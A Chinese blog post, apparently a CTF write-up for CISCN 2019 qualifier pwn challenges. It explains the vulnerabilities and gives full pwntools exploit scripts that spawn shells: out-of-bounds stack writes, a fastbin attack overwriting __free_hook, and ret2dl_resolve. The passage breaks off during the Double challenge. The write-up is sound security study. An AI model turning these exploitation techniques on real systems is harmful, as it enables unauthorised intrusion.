<!DOCTYPE html>
<html>
<head>
  <meta name="referrer" content="no-referrer" />
  <!--解决简书外链403-->
  <meta charset="utf-8">
  <meta name="baidu-site-verification" content="L6Lm9d5Crl"/>
  
  
  
  
  <title>CISCN2019 国赛线上初赛pwn | Hacked By Fish_o0O</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="0x00 写在前面最后一次参加国赛了额，无论队伍能否走到决赛，我都无缘参赛了，希望队伍能走的更远吧。这次国赛比起前两年的题目要简单的很多，大部分题目都很基础，漏洞点很明显，利用思路也异常清晰。利用毕设的闲暇时间整理下writeup">
<meta property="og:type" content="article">
<meta property="og:title" content="CISCN2019 国赛线上初赛pwn">
<meta property="og:url" content="http://fish-o0o.github.io/2020/03/12/CISCN2019%20%E5%9B%BD%E8%B5%9B%E7%BA%BF%E4%B8%8A%E5%88%9D%E8%B5%9Bpwn/index.html">
<meta property="og:site_name" content="Hacked By Fish_o0O">
<meta property="og:description" content="0x00 写在前面最后一次参加国赛了额，无论队伍能否走到决赛，我都无缘参赛了，希望队伍能走的更远吧。这次国赛比起前两年的题目要简单的很多，大部分题目都很基础，漏洞点很明显，利用思路也异常清晰。利用毕设的闲暇时间整理下writeup">
<meta property="og:locale" content="zh">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8447551-0e04acab67fd65e9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8447551-08aa0f9dc18c597d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8447551-4c7332a4d2c51fda.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8447551-72206999e2bed84e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8447551-9832ed3b16a2c38a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8447551-09343d8bc0df869b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8447551-5fa5c4ad57ea3844.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8447551-9bb49cc235d2222d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8447551-d34e52f245996baa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8447551-67d35db7ff7feb40.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8447551-ff27fde749585f9b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="article:published_time" content="2020-03-12T20:30:43.940Z">
<meta property="article:modified_time" content="2020-03-12T18:55:35.813Z">
<meta property="article:author" content="Fish_o0O">
<meta property="article:tag" content="Pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://upload-images.jianshu.io/upload_images/8447551-0e04acab67fd65e9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
  
    <link rel="alternative" href="/atom.xml" title="Hacked By Fish_o0O" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/favicon.png">
  
  
  
<link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet" />
  <script>
      var yiliaConfig = {
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
<meta name="generator" content="Hexo 4.2.0"></head>

<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        
<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

        <a href="/" class="profilepic">
            
            <img lazy-src="/img/avatar.png" class="js-avatar">
            
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">Fish_o0O</a></h1>
        </hgroup>
        
        <p class="header-subtitle">KEEEEEEEEEP STUDY！</p>
        
        
            <form>
                <input type="text" class="st-default-search-input search" id="local-search-input" placeholder="搜索一下" autocomplete="off">
            </form>
            <div id="local-search-result"></div>
        
        
            <script type="text/javascript">
                (function() {
                    'use strict';
                    function getMatchData(keyword, data) {
                        var matchData = [];
                        for(var i =0;i<data.length;i++){
                            if(data[i].title.toLowerCase().indexOf(keyword)>=0) 
                                matchData.push(data[i])
                        }
                        return matchData;
                    }
                    var $input = $('#local-search-input');
                    var $resultContent = $('#local-search-result');
                    $input.keyup(function(){
                        $.ajax({
                            url: '/search.json',
                            dataType: "json",
                            success: function( json ) {
                                var str='<ul class=\"search-result-list\">';                
                                var keyword = $input.val().trim().toLowerCase();
                                $resultContent.innerHTML = "";
                                if ($input.val().trim().length <= 0) {
                                    $resultContent.empty();
                                    $('#switch-area').show();
                                    return;
                                }
                                var results = getMatchData(keyword, json);
                                if(results.length === 0){
                                    $resultContent.empty();
                                    $('#switch-area').show();
                                    return;
                                } 
                                for(var i =0; i<results.length; i++){
                                    str += "<li><a href='"+ results[i].url +"' class='search-result-title'>"+ results[i].title +"</a></li>";
                                }
                                str += "</ul>";
                                $resultContent.empty();
                                $resultContent.append(str);
                                $('#switch-area').hide();
                            }
                        });
                    });
                })();
            </script>
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        
        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a  href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl github"  target="_blank" href="/Fish_o0O" title="github">github</a>
                            
                        </ul>
                    </nav>
                </section>
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <a href="/tags/Pwn/" style="font-size: 20px;">Pwn</a> <a href="/tags/Vulnerability/" style="font-size: 10px;">Vulnerability</a> <a href="/tags/%E9%9A%8F%E7%AC%94/" style="font-size: 15px;">随笔</a>
                    </div>
                </section>
                
                
                
                
                <section class="switch-part switch-part3">
                
                    <div id="js-aboutme">一个被兴趣牵着鼻子走的菜鸡</div>
                </section>
                
            </div>
        </div>
    </header>
</div>

    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">Fish_o0O</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/avatar.png" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">Fish_o0O</a></h1>
            </hgroup>
            
            <p class="header-subtitle">KEEEEEEEEEP STUDY！</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="github" target="_blank" href="/Fish_o0O" title="github">github</a>
                    
                </div>
            </nav>
        </header>
    </div>
</nav>
      <div class="body-wrap"><article id="post-CISCN2019 国赛线上初赛pwn" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a  href="/2020/03/12/CISCN2019%20%E5%9B%BD%E8%B5%9B%E7%BA%BF%E4%B8%8A%E5%88%9D%E8%B5%9Bpwn/" class="article-date">
      <time datetime="2020-03-12T20:30:43.940Z" itemprop="datePublished">2020-03-12</time>
</a>

    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      CISCN2019 国赛线上初赛pwn
    </h1>
  


      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Pwn/" rel="tag">Pwn</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h2 id="0x00-写在前面"><a href="#0x00-写在前面" class="headerlink" title="0x00 写在前面"></a>0x00 写在前面</h2><p>最后一次参加国赛了额，无论队伍能否走到决赛，我都无缘参赛了，希望队伍能走的更远吧。这次国赛比起前两年的题目要简单的很多，大部分题目都很基础，漏洞点很明显，利用思路也异常清晰。利用毕设的闲暇时间整理下<strong>writeup</strong></p>
<a id="more"></a>

<h2 id="0x01-your-pwn"><a href="#0x01-your-pwn" class="headerlink" title="0x01 your_pwn"></a>0x01 your_pwn</h2><ul>
<li>程序功能</li>
</ul>
<p>一直输入<strong>name</strong>，以及数组中<strong>name</strong>对应的<strong>index</strong>。</p>
<ul>
<li>漏洞位置</li>
</ul>
<p>在功能函数中，再输入<strong>index</strong>时没有检测其合法性，导致在之后会有数组越界访问的漏洞。<br><img src="https://upload-images.jianshu.io/upload_images/8447551-0e04acab67fd65e9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="功能函数"></p>
<ul>
<li>利用思路</li>
</ul>
<p>虽然本题保护机制全开。<br><img src="https://upload-images.jianshu.io/upload_images/8447551-08aa0f9dc18c597d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="checksec"><br>但通过合理利用数组越界可达到栈上任意地址读写的目的。可以定点修改返回地址劫持程序控制流。<br>第一步，通过任意地址读，找到存在栈上的<strong>__libc_start_main + 240</strong>偏移后<strong>leak</strong>出<strong>libc</strong>基址。<br>第二步，找到栈上存的返回地址的偏移，并将其写为<strong>one_gadget</strong>。<br>第三步，让程序正常返回，劫持程序流到<strong>one_gadget</strong>来<strong>get shell</strong>。</p>
<ul>
<li><strong>my-exp</strong></li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">local = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> local:</span><br><span class="line">	p = process(<span class="string">'./pwn'</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	p = remote(<span class="string">'1b190bf34e999d7f752a35fa9ee0d911.kr-lab.com'</span> , <span class="number">57856</span>)<span class="comment">#nc 1b190bf34e999d7f752a35fa9ee0d911.kr-lab.com 57856</span></span><br><span class="line"></span><br><span class="line">libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc-2.23.so'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">debug</span><span class="params">()</span>:</span></span><br><span class="line">	<span class="keyword">print</span> pidof(p)</span><br><span class="line">	raw_input()</span><br><span class="line"></span><br><span class="line"><span class="comment">#step1 leak libc_base</span></span><br><span class="line">p.recvuntil(<span class="string">'name:'</span>)</span><br><span class="line">p.sendline(<span class="string">'test'</span>)</span><br><span class="line">libc_leak = <span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">637</span> , <span class="number">631</span> , <span class="number">-1</span>):</span><br><span class="line">	p.recvuntil(<span class="string">'index\n'</span>)</span><br><span class="line">	p.sendline(str(i))</span><br><span class="line">	p.recvuntil(<span class="string">'(hex) '</span>)</span><br><span class="line">	aa = p.recvuntil(<span class="string">'\n'</span>)[:<span class="number">-1</span>]</span><br><span class="line">	<span class="keyword">if</span>(len(aa) &lt; <span class="number">2</span>):</span><br><span class="line">		libc_leak += <span class="string">'0'</span> + aa</span><br><span class="line">	<span class="keyword">elif</span>(len(aa) == <span class="number">8</span>):</span><br><span class="line">		libc_leak += aa[<span class="number">-2</span>:]</span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">		libc_leak += aa</span><br><span class="line">	p.recvuntil(<span class="string">'value\n'</span>)</span><br><span class="line">	p.sendline(<span class="string">'1'</span>)</span><br><span class="line"><span class="keyword">print</span> libc_leak</span><br><span class="line">libc.address = int(<span class="string">'0x'</span> + libc_leak , <span class="number">16</span>) - libc.symbols[<span class="string">'__libc_start_main'</span>] - <span class="number">240</span></span><br><span class="line">success(<span class="string">'libc_base =&gt; '</span> + hex(libc.address))</span><br><span class="line">one_gadget = <span class="number">0xf02a4</span> + libc.address</span><br><span class="line"></span><br><span class="line"><span class="comment">#step2 overwrite EIP to one_gadget</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">6</span>):</span><br><span class="line">	p.recvuntil(<span class="string">'index\n'</span>)</span><br><span class="line">	p.sendline(str(i + <span class="number">344</span>))</span><br><span class="line">	p.recvuntil(<span class="string">'value\n'</span>)</span><br><span class="line">	p.sendline(str(ord(p64(one_gadget)[i])))</span><br><span class="line"></span><br><span class="line"><span class="comment">#Get Shell &amp; Have Fun</span></span><br><span class="line"><span class="comment">#debug()</span></span><br><span class="line">p.sendline(<span class="string">'a'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'(yes/no)? \n'</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="0x02-daily"><a href="#0x02-daily" class="headerlink" title="0x02 daily"></a>0x02 daily</h2><ul>
<li>程序功能</li>
</ul>
<p>一个记录日报的日记本题目，可指定日报的长度和内容，具有正常的增删查改功能。</p>
<ul>
<li>漏洞位置</li>
</ul>
<p>在<strong>remove</strong>功能中，由于没有对输入的<strong>index</strong>进行检查，会导致数组越界，造成任意地址<strong>free</strong>。<br><img src="https://upload-images.jianshu.io/upload_images/8447551-4c7332a4d2c51fda.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="remove"></p>
<ul>
<li>利用思路</li>
</ul>
<p>程序开了除<strong>PIE</strong>外所有的保护机制。<br><img src="https://upload-images.jianshu.io/upload_images/8447551-72206999e2bed84e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="checksec"><br>通过任意地址<strong>free</strong>，直接<strong>free</strong>堆头地址，再利用<strong>bss</strong>留存的堆块指针进行<strong>UAF</strong>操作。<br>第一步，正常利用<strong>unsort bin</strong>进行堆基址和<strong>libc</strong>基址的<strong>leak</strong>。<br>第二步，利用任意地址<strong>free</strong>，直接将布置好的堆块<strong>free</strong>到<strong>fastbin</strong>中。<br>第三步，利用<strong>bss</strong>段留存的该堆块指针，进行<strong>fastbin attack</strong>，将<strong>bss</strong>段当作堆块申请。<br>第四步，通过申请到的<strong>bss</strong>段堆块，将其余堆块指针覆盖为<strong>free_hook</strong>地址，并通过<strong>edit</strong>被覆盖的堆块索引，将<strong>free_hook</strong>写为<strong>system</strong>地址。<br>第五步，通过<strong>free</strong>之前布置好的<strong>data</strong>为<strong>‘/bin/sh\x00’</strong>的对应<strong>Header</strong>来<strong>get shell</strong>。</p>
<ul>
<li><strong>my-exp</strong></li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">local = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> local:</span><br><span class="line">	p = process(<span class="string">'./pwn'</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	p = remote(<span class="string">'85c3e0fcae5e972af313488de60e8a5a.kr-lab.com'</span> , <span class="number">58512</span>)<span class="comment">#nc 85c3e0fcae5e972af313488de60e8a5a.kr-lab.com 58512</span></span><br><span class="line"></span><br><span class="line">libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc-2.23.so'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span><span class="params">()</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'choice:'</span>)</span><br><span class="line">	p.sendline(<span class="string">'1'</span>)</span><br><span class="line">	raw = p.recvuntil(<span class="string">'==='</span>)[:<span class="number">-4</span>]</span><br><span class="line">	<span class="keyword">return</span> raw</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(length , content)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'choice:'</span>)</span><br><span class="line">	p.sendline(<span class="string">'2'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'daily:'</span>)</span><br><span class="line">	p.sendline(str(length))</span><br><span class="line">	p.recvuntil(<span class="string">'daily\n'</span>)</span><br><span class="line">	p.sendline(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">change</span><span class="params">(index , content)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'choice:'</span>)</span><br><span class="line">	p.sendline(<span class="string">'3'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'daily:'</span>)</span><br><span class="line">	p.sendline(str(index))</span><br><span class="line">	p.recvuntil(<span class="string">'daily\n'</span>)</span><br><span class="line">	p.sendline(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">remove</span><span class="params">(index)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'choice:'</span>)</span><br><span class="line">	p.sendline(<span class="string">'4'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'daily:'</span>)</span><br><span class="line">	p.sendline(str(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">debug</span><span class="params">()</span>:</span></span><br><span class="line">	<span class="keyword">print</span> pidof(p)</span><br><span class="line">	raw_input()</span><br><span class="line"></span><br><span class="line"><span class="comment">#step1 leak libc&amp;heap base</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">5</span>):</span><br><span class="line">	add(<span class="number">0x80</span> , <span class="string">'\x00'</span> * <span class="number">0x5f</span>)</span><br><span class="line">debug()</span><br><span class="line">remove(<span class="number">1</span>)</span><br><span class="line">remove(<span class="number">3</span>)</span><br><span class="line">add(<span class="number">0x80</span> , <span class="string">''</span>)</span><br><span class="line">libc.address = u64(show().split(<span class="string">'1 : '</span>)[<span class="number">1</span>][:<span class="number">6</span>].ljust(<span class="number">8</span> , <span class="string">'\x00'</span>)) - <span class="number">0x3c4b0a</span></span><br><span class="line">change(<span class="number">1</span> , <span class="string">'abcdefgh'</span>)</span><br><span class="line">heap_base = u64(show().split(<span class="string">'abcdefgh'</span>)[<span class="number">1</span>].split(<span class="string">'2 :'</span>)[<span class="number">0</span>].ljust(<span class="number">8</span> , <span class="string">'\x00'</span>)) - <span class="number">0x10a</span></span><br><span class="line">free_hook = libc.symbols[<span class="string">'__free_hook'</span>]</span><br><span class="line">system_addr = libc.symbols[<span class="string">'system'</span>]</span><br><span class="line">success(<span class="string">'libc_base =&gt; '</span> + hex(libc.address))</span><br><span class="line">success(<span class="string">'heap_base =&gt; '</span> + hex(heap_base))</span><br><span class="line">success(<span class="string">'free_hook =&gt; '</span> + hex(free_hook))</span><br><span class="line">success(<span class="string">'system_addr =&gt; '</span> + hex(system_addr))</span><br><span class="line"></span><br><span class="line"><span class="comment">#step2 clear heap</span></span><br><span class="line">remove(<span class="number">4</span>)</span><br><span class="line">remove(<span class="number">2</span>)</span><br><span class="line">remove(<span class="number">1</span>)</span><br><span class="line">remove(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#step3 free2fastbin</span></span><br><span class="line">add(<span class="number">0x30</span> , <span class="string">'a'</span> * <span class="number">8</span> + p64(heap_base + <span class="number">0x10</span>))	<span class="comment">#heap_base + 0x18</span></span><br><span class="line">offset = (heap_base - <span class="number">0x602060</span>) / <span class="number">16</span> + <span class="number">1</span></span><br><span class="line">remove(offset)</span><br><span class="line"></span><br><span class="line"><span class="comment">#step4 fastbin attack : free_hook =&gt; system</span></span><br><span class="line">add(<span class="number">0x41</span> , <span class="string">'\x00'</span> * <span class="number">0x40</span>)</span><br><span class="line">change(<span class="number">0</span> , p64(<span class="number">0x602068</span>))</span><br><span class="line">add(<span class="number">0x30</span> , <span class="string">'/bin/sh\x00'</span>)		<span class="comment">#heap</span></span><br><span class="line">add(<span class="number">0x30</span> , p64(free_hook))		<span class="comment">#bss</span></span><br><span class="line">change(<span class="number">1</span> , p64(system_addr))</span><br><span class="line"></span><br><span class="line"><span class="comment">#Get Ghell &amp; Have Fun</span></span><br><span class="line">remove(<span class="number">0</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="0x03-baby-pwn"><a href="#0x03-baby-pwn" class="headerlink" title="0x03 baby_pwn"></a>0x03 baby_pwn</h2><ul>
<li>程序功能</li>
</ul>
<p>没啥功能，就让输入个东西。</p>
<ul>
<li>漏洞位置</li>
</ul>
<p>在<strong>vuln</strong>函数中存在由<strong>read</strong>导致的栈溢出漏洞。<br><img src="https://upload-images.jianshu.io/upload_images/8447551-9832ed3b16a2c38a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="vuln"></p>
<ul>
<li>利用思路</li>
</ul>
<p>程序为<strong>32</strong>位程序，并且只开了<strong>NX</strong>保护机制。<br><img src="https://upload-images.jianshu.io/upload_images/8447551-09343d8bc0df869b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="checksec"><br>由于整个程序中调用函数太少，缺少构造<strong>ROP</strong>必要的函数，因此考虑采用<strong>ret2dl_resolve</strong>来<strong>get shell</strong>。所以用了<strong>roptils</strong></p>
<ul>
<li><strong>my-exp</strong></li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> roputils <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">fpath = <span class="string">'./pwn'</span></span><br><span class="line">offset = <span class="number">44</span></span><br><span class="line"></span><br><span class="line">rop = ROP(fpath)</span><br><span class="line">addr_bss = rop.section(<span class="string">'.bss'</span>)</span><br><span class="line"></span><br><span class="line">buf = rop.retfill(offset)</span><br><span class="line">buf += rop.call(<span class="string">'read'</span>, <span class="number">0</span>, addr_bss, <span class="number">100</span>)</span><br><span class="line">buf += rop.dl_resolve_call(addr_bss+<span class="number">20</span>, addr_bss)</span><br><span class="line"></span><br><span class="line">p = Proc(rop.fpath)</span><br><span class="line">p.write(p32(len(buf)) + buf)</span><br><span class="line"><span class="keyword">print</span> <span class="string">"[+] read: %r"</span> % p.read(len(buf))</span><br><span class="line"></span><br><span class="line">buf = rop.string(<span class="string">'/bin/sh'</span>)</span><br><span class="line">buf += rop.fill(<span class="number">20</span>, buf)</span><br><span class="line">buf += rop.dl_resolve_data(addr_bss+<span class="number">20</span>, <span class="string">'system'</span>)</span><br><span class="line">buf += rop.fill(<span class="number">100</span>, buf)</span><br><span class="line"></span><br><span class="line">p.write(buf)</span><br><span class="line">p.interact(<span class="number">0</span>)</span><br></pre></td></tr></table></figure>

<h2 id="0x04-Double"><a href="#0x04-Double" class="headerlink" title="0x04 Double"></a>0x04 Double</h2><ul>
<li>程序功能</li>
</ul>
<p>一个管理输入<strong>data</strong>的<strong>note</strong>式程序，含有增删查改功能，并且每次<strong>data</strong>由一个大小为<strong>0x18</strong>的结构体管理，该结构体数据结构如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">Header</span>&#123;</span></span><br><span class="line">    __int32 index;</span><br><span class="line">    __int32 length;</span><br><span class="line">    <span class="keyword">char</span>* data;</span><br><span class="line">    Header* next_Header;</span><br><span class="line">&#125;Header;</span><br></pre></td></tr></table></figure>

<ul>
<li>漏洞位置</li>
</ul>
<p>在增加数据时，如果前后两次输入的<strong>data</strong>完全一样时，会导致两个<strong>Header</strong>的<strong>content_ptr</strong>指向同一个地址，很容易造成<strong>UAF</strong>漏洞。<br><img src="https://upload-images.jianshu.io/upload_images/8447551-5fa5c4ad57ea3844.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="add_data"></p>
<ul>
<li>利用思路</li>
</ul>
